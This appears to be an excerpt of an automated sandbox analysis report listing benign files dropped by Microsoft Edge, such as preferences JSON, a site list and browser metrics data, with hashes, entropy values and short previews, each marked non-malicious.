                                                                                                                                                                                                                                                                                  SHA-512:74473F8D35EA2B20D21EEB9BB7680D88840FB72E13DA1D9C4AEDC21856176CCD1A22B87BE88DA43A250085198DB6746C27EBFF021F653BE631D9C44D3A8FBAD8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABcnR0lPmWCTIn8SLWyo3pfEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACElbBPbJUdz3hJPxEEYx4aEJx0JYJ7RPnh5jKMBQMVYwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8389
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.791266154029815
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:fsNwkLXeiRUKQjtk9y6qRAq1k8SPxVLZ7VTiQ:fsNwkLDm+9y6q3QxVNZTiQ
                                                                                                                                                                                                                                                                                  MD5:FA2291392BEBD6AF2C797BD2D9EA2E22
                                                                                                                                                                                                                                                                                  SHA1:F4EE67261C6DD6DAEAEC30DA27417703DD43B733
                                                                                                                                                                                                                                                                                  SHA-256:1B92A1675D579C75BB2DF022F78D238B9482EA2A77DCB37DBFC02D3F02A51964
                                                                                                                                                                                                                                                                                  SHA-512:239E17E824F7F43ED26E8AD2CA7917ADAA8D9E15A47A445C334E3271A12DD2010902919DC3109409613C2B695788707DA6200700AB780B6C185E6BDB5E926E28
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):22928
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.046629242094774
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:ztMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhCJKoE+9MT35ub/Y3jFd4/:5MkbJrT8IeQc5d1VP+9ML5uTY3Je
                                                                                                                                                                                                                                                                                  MD5:B0D69D72E9A42E1E5DE81157B229FAC9
                                                                                                                                                                                                                                                                                  SHA1:B5E3A62A343503E350DEC3B1387D3FC84DCDD3FE
                                                                                                                                                                                                                                                                                  SHA-256:FA3794CBE3E27F9FB6F27C28B0B6CD4C02D71AD27488E7E3C2DB612A044B0B6A
                                                                                                                                                                                                                                                                                  SHA-512:34FC0973EFE5324C9375A16F6959C3CB325D1EFDA64379715AD81D2B38352D6149C301ECF04ACC6E79F71FD3766979E6E486593E74C51F1C17BFB77A8A7B5DAF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380417156830918","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735943561"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):23950
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.0476643460598085
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:ztMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhCJKoG0uf93fT35ub/Y3jFd4r:5MkbJrT8IeQc5d1Vkuf93fL5uTY3Jg
                                                                                                                                                                                                                                                                                  MD5:E96485AA0687AACC47F1CE8C9CE0441D
                                                                                                                                                                                                                                                                                  SHA1:13A3BC09561E6DFC5989E9E879D76D16ACAC0E9D
                                                                                                                                                                                                                                                                                  SHA-256:A6CB3AAF242EF320200F2A2F31267DC732EFFB1B9BE492E1E4A02BB3C6CA8162
                                                                                                                                                                                                                                                                                  SHA-512:7FACE5DD416E7CAB24CED68E66A26654021CE044D5A6B9A1E7D21507CAB53F93232CDD0897919D75F33EED1132C0D106324C1A2817CBEDD175D21E1FF82D6B63
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380417156830918","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735943561"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):27440
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.042084865601361
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:ztMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNihaJKoKF8h5Rap0zm8T35ub/Y3jFd46:5MkbJrT8IeQc5dDpjyhy0zm8L5uTY3JX
                                                                                                                                                                                                                                                                                  MD5:1B10E1890616CBA94EB1BEC531C3DEEA
                                                                                                                                                                                                                                                                                  SHA1:24B8AA34357E08904B46C9A484879696C3D7EF33
                                                                                                                                                                                                                                                                                  SHA-256:3D4DFAB8C9B45FCC6C7AD2453C9B66A16C19ED40F99C3FB093AC49A6C22B5B77
                                                                                                                                                                                                                                                                                  SHA-512:04E5615908884C523FF69FCC534FAE02B604F6987EDF6E8049946AC6CD23C6C014372D5C31C7D557296F8ABF3F5AD1BDA5268F6024927E3383D3D8A42F1FC394
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380417156830918","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735943561"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.640159935562401
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                                                                                                                                  MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                                                                                                                                  SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                                                                                                                                  SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                                                                                                                                  SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.640159935562401
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                                                                                                                                  MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                                                                                                                                  SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                                                                                                                                  SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                                                                                                                                  SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4115607996519466
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:JyfX4wWE9/XNl9fdlAfRByECrBaT7cEzPr6OqogvlyW50I9PT5ghg1HF0:c4I91l9f/Afb6OcEf6OqNlpV9PT+haH
                                                                                                                                                                                                                                                                                  MD5:8EA36141567A0DA55D85A5DEB66EEF75
                                                                                                                                                                                                                                                                                  SHA1:0DDF70B15FC88007D94E295399ADBA89A1BD1E1D
                                                                                                                                                                                                                                                                                  SHA-256:AAFA56BBFBE2F77DDB968242503D2D34E4E04A46952AC630D869052EA0B03C17
                                                                                                                                                                                                                                                                                  SHA-512:677A2628C5847C98AD3195DCEDA0EE54E41741796F5FE09EF6DBBCDAC2C2D61FA7751B0EEB263526B4466BF083D38586744FED3E40245977CD7443B7B6221D5B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@................6...*..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....y.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".ufudtd20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U?:K...G..>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....trig
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.039683744577825475
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:n601utmqvDzKX7AJ8iD12absbZHtgbXQh8IYhHBNELi/cRQMcwZRBn8y08Tcm2Rl:60EtNlWCfhhxQNHB08T2RGOD
                                                                                                                                                                                                                                                                                  MD5:70E2078B8EDAEBA2DAE754746B3E30D3
                                                                                                                                                                                                                                                                                  SHA1:EA3246A036AEC4222B8DDB34CD7CA8C68C290294
                                                                                                                                                                                                                                                                                  SHA-256:D5F755A423536C7E17A866E90C9361F5750E6FF33E263D623117129ACBCD8F41
                                                                                                                                                                                                                                                                                  SHA-512:2D59D89AFDFCC67748977563799422769BC30E05F2F0DAE43A41432C2156A61E21C8AC1722128B6995A38EB59BC78847FEEDA4B97B08D048E6B059386A192A67
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@................a...P..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....u.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".ufudtd20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U..G..>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z.......................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.040718846545947755
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:3o0EbtmqvDtKX7RJEa3XxxTxqZ/g+XM970R6Eqh57NgGnG1gQMNC0jn8y08Tcm2D:Y0EtGeK8YFFhxFCgxCo08T2RGOD
                                                                                                                                                                                                                                                                                  MD5:96F55F6708A075A352D224DF3C523580
                                                                                                                                                                                                                                                                                  SHA1:7609C6AFBFE8E960DDB745D67660A7CFEA91F8EA
                                                                                                                                                                                                                                                                                  SHA-256:6B10887FD427244A998304DBE07C20F07ED0F33721B7E6A1320DE309830E6748
                                                                                                                                                                                                                                                                                  SHA-512:7C8E982256D19FE6917C1A83F0E69054D2BE61FB83EB2B7A5696AE9C73A01D32453EB87E98069FB2FC97BA5001EC5268F4496D4B3A15B227BE4B95B6E91BBFC9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@................b...Q..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".ufudtd20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.23751222175573813
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:0Kvq++jOECZMKq0q78g9LZtG6Ttg8Z16gUaPCpAphSsfcI8egbadTB3/a2TF8WjV:Y+m8Kva84egb6jw
                                                                                                                                                                                                                                                                                  MD5:C32E94C8EACB6F4F14CD122B9355060D
                                                                                                                                                                                                                                                                                  SHA1:ADCE3250EAAF4D6FEEBF88556B6BA40F5BF58890
                                                                                                                                                                                                                                                                                  SHA-256:909153432C3EAC16F9C9F2A91AA2B68A09523496DA6D0C895B6CBAA84CFA7EA7
                                                                                                                                                                                                                                                                                  SHA-512:09628EF5A7DC866232D5701F54E5D88B613F2C578D5DE47E34F9C3DBCFD6AC2A4A00C449CC8ABFD86B181C54689ABD2634557B337EEAC2D592A43D3504BFCC41
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@...................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452....x86_64..?........".ufudtd20,1(.0..8..B....(.....10.0.19041.5462.Google Inc. (Google):bANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver-5.0.0)M..BU..Be...?j...GenuineIntel... .. ..............x86_64...J../T...^o..J...Y...^o..J..w....^o..J..h....^o..J..A....^o..J....c..^o..J...c=..^o..J....J..^o..J...#...^o..J....k..^o..J..S..O.^o..J..l.zL.^o..J..1.9..^o..J..@."..^o..J..?U...^o..J..aV...^o..J..z{...^o..J..n....^o..J...@...^o..J...I.r.^o..J.......^o..J..ZK...^o..J.....^o..J..@N...^o..J.......^o..J....\.^o..J.....f.^o..J...7Y..^o..J......^o..J.......^o..J..c.p.^o..J.. .E..^o.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3553968406659012
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:biUXhV0xosU8xCe+JKlkQuMRxCb8ZXfgYJ0IJpP0KLsyW1L7Fx6:bFRqxosU8xWMk8xVZ4YWI30otWn
                                                                                                                                                                                                                                                                                  MD5:CFAB81B800EDABACBF6CB61AA78D5258
                                                                                                                                                                                                                                                                                  SHA1:2730D4DA1BE7238D701DC84EB708A064B8D1CF27
                                                                                                                                                                                                                                                                                  SHA-256:452A5479B9A2E03612576C30D30E6F51F51274CD30EF576EA1E71D20C657376F
                                                                                                                                                                                                                                                                                  SHA-512:EC188B0EE4D3DAABC26799B34EE471BEE988BDD7CEB011ED7DF3D4CF26F98932BBBB4B70DC2B7FD4DF9A3981B3CE22F4B5BE4A0DB97514D526E521575EFB2EC6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...@.@...@..............@...................................`... ...i.y.........CrashpadMetrics.....i.y..Yd.h.......A.......e............,.........W.......................W....................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.UsedPct.......h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.........A............................E.[4.f..................E.[4.f.................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.Errors............i.y..Yd.........A..................._..-`....h-.....................h-....................Crashpad.HandlerLifetimeMilestone.......0...i.y.[".........................................i.y..Yd.@.......C...........................VM....],................WM....],................Stability.BrowserExitCodes...... ...i.y......VM....],........H...i.y.1U!S............................................................ ...i.y...0...WM....],........................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.187800137618523
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:FiWWltl/9eIth1iUniIWpCWjwBVP/Sh/JzvLi2RRIxINXj1J1:o1/tdiKgjwBVsJDG2Yq
